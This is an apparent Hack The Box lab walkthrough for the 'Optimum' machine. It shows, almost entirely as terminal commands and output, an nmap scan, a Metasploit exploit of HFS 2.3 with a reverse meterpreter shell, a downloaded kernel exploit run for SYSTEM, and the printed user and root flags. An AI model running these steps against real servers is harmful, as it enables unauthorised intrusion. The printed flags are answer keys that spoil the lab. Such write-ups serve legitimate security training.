Optimum (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-11 11:48 EDT
Nmap scan report for 10.10.10.8
Host is up (0.14s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 138.74 ms 10.10.14.1
2 138.75 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.15 seconds

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(windows/http/rejetto_hfs_exec) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.10.8
msf exploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) >exploit

msf exploit(windows/http/rejetto_hfs_exec) > sessions 1

meterpreter >

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

root@kali:~# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Meterpreter> upload /root/Desktop/41020.exe .
Meterpreter> shell

C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users\kostas\Desktop

18/03/2019 02:51 ??

.
18/03/2019 02:51 ??..
18/03/2019 02:49 ??%TEMP%
18/03/2019 02:51 ?? 560.128 41020.exe
18/03/2017 02:11 ?? 760.320 hfs.exe
18/03/2019 02:41 ?? 1.358 pogrPheZqbkU.txt
18/03/2017 02:13 ?? 32 user.txt.txt
4 File(s) 1.321.838 bytes
3 Dir(s) 31.893.475.328 bytes free

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

C:\Users\kostas\Desktop>cd ..
cd cd ..

C:\Users\kostas>..
cd ..

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users

18/03/2017 01:57 ??

.
18/03/2017 01:57 ??..
18/03/2017 01:52 ??Administrator
18/03/2017 01:57 ??kostas
22/08/2013 05:39 ??Public
0 File(s) 0 bytes
5 Dir(s) 31.893.475.328 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users\Administrator\Desktop

18/03/2017 02:14 ??

.
18/03/2017 02:14 ??..
18/03/2017 02:14 ?? 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.475.328 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
51ed1b36553c8461f4552c2e92b3eeed

@SAKSHAM DIXIT